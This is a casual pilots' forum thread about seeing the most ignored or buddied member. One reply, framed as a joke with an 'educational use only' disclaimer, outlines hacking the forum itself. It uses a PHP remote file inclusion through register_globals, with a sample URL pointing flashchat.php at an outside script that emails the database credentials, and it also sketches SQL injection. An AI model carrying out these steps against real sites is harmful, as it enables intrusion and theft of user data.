Hey, this would be neat...what say the big guys?

SkyHog

Touchdown! Greaser!
Joined
Feb 23, 2005
Messages
18,431
Location
Castle Rock, CO
Display Name

Display name:
Everything Offends Me
I was thinking it'd be interesting to see the most ignored/buddied poster on PoA.

Can you do that, and if so, would you? Seems it would be fun.
 
Nick, Nick, Nick...

...you are just asking for trouble with that!

Besides, I could not handle the abuse.
 
I'd add my 2 cents...but I don't think anybody would be able to see it.:dunno:
 
I was thinking it'd be interesting to see the most ignored/buddied poster on PoA.

Can you do that, and if so, would you? Seems it would be fun.
I say I think its not an idea that will ultimately lead anywhere positive. Or in short: No. I suspect the rest of the MC will agree with me on that...
 
I was thinking it'd be interesting to see the most ignored/buddied poster on PoA.

Can you do that, and if so, would you? Seems it would be fun.

I think you'd have to do that on your own. Find an include() function in one of the weak extensions to this forum. Flash Chat or some other thing Chuck added would be a good start. If you could find an include that uses a variable for example:
Code:
$script=fancyscript.php


include($script);
That is the EASIEST thing to look for in php (ideally you'll need the source to do this, buy it). If you see something like that you can almost *COUNT* on most web servers being setup crappy with register_globals on. If that's the case you can just pass a new script via the URL.

Once you find this you just setup a file on your web server.

call it.. executepoa.php

You could put anything you want in there that would exceute on the POA server. It would be *very* simple to write a script that would e-mail the configuration file for Vbulletin that holds the database username/password.

Now you just trick the POH script into executing it by doing something like this:

Code:
http://www.pilotsofamerica.com/flashchat.php?script=http://www.nickswebsite.com/executepoa.php
Now you just reassigned that script variable (like i said i bet register globals is on which is what makes this possible) to inject your own code into the POA code.

Once you get the database username and password it would be simple to modify your code injection to dump the database into a compressed file to e-mail to yourself.

Or you could always just go with the classic SQL injection which is also pretty easy most of the time. More or less you just need some type of form input box. If you can get that with some patience (really helps to have the source code to look at) you can write an SQL query inside that box. That box is usually a varibles which is dropped into a database query. If you format it right you can add another query inside that query and have it format the output to display it on the following page. Figure out the formatting right and with a little luck the programmers probably didn't properly verify data input and you've got your answer to your most ignored question.

Of course--I'm sure none of this could happen since all the extensions are probably rock solid and I highly doubt a responsible system admin like Chuck would have register_globals enabled (although many php scripts depend on it being on).

I guess it just depends how bad you want to know....I'd rather do something more fun like photoshop pictures of Tony.

Void where prohibitied. Educational use only. Pure speculation. Do any of this and CowboyPilot and Chuck will kick your ass.. Blah Blah Legal crap.
 
Last edited:
I was thinking it'd be interesting to see the most ignored/buddied poster on PoA.

Can you do that, and if so, would you? Seems it would be fun.

I bet "Mountain Hopper" is the most ignored!

Does anyone actually use the buddy feature?
 
I've got no buddies ... but you all wouldn't know that because y'all are ignoring me, anyway ...

just kidding ... maybe :dunno: :D but then anything one might say could just be interpreted as a pitiful cry for attention?
 
I'll bet there aren't that many people being ignored. I suspect there are even fewer buddies. It's relatively peaceful here.
 
I'll bet there aren't that many people being ignored. I suspect there are even fewer buddies. It's relatively peaceful here.
Actually, I have zero on the ignore list and three on the buddy list. Though, to be frank, I don't know what the buddy list does, other than maybe popping up on the home page that you have buddies online. (And yes, one of my buddies is Leslie :))
 
Actually, I come here because there aren't many distasteful posts. Don't have anyone dialed in or out! There are some posts I kind of elide over, but that's more a time than interest thing.

Best,

Dave
 
I've only ever put two on the ignore list, and neither of them are around any longer anyway. I really didn't know how the buddy list worked until this thread started and I went an looked.
 
I was thinking it'd be interesting to see the most ignored/buddied poster on PoA.

Can you do that, and if so, would you? Seems it would be fun.

I don't use either feature. I'm a big boy now and can ignore people all by myself. Now if I could just figure out how to tie my shoes...:dunno:
 
I don't use either feature. I'm a big boy now and can ignore people all by myself. Now if I could just figure out how to tie my shoes...:dunno:
Something about the rabbit running around the tree and into the hole....
 
What is the point of declaring someone a "buddy" anyway? you can still see if someone is online regardless.
 
I don't use either feature. I'm a big boy now and can ignore people all by myself. Now if I could just figure out how to tie my shoes...:dunno:
The answer is slip ons (loafers), sandals (though REAL men don't wear them), or cowboy boots. And you know how the girls love COWBOYS.
 
. Now if I could just figure out how to tie my shoes...:dunno:

left over right and you're alright......
Ooh wait....... that's not it
That's red over white....:yes:

green on the right? Red on the left"
nah... that's I.C.W. bouy's

Hmmmmm...... Can't you just use "Velcro"?? :dunno: ;)
 
I am surprised only 2 people have responded to this thread so far.
 
I am surprised only 2 people have responded to this thread so far.
Two? Which number system are you using?

Wait... nevermind. Under Janet's system... two voters equals sixteen votes for a single candidate. :D
 
Back
Top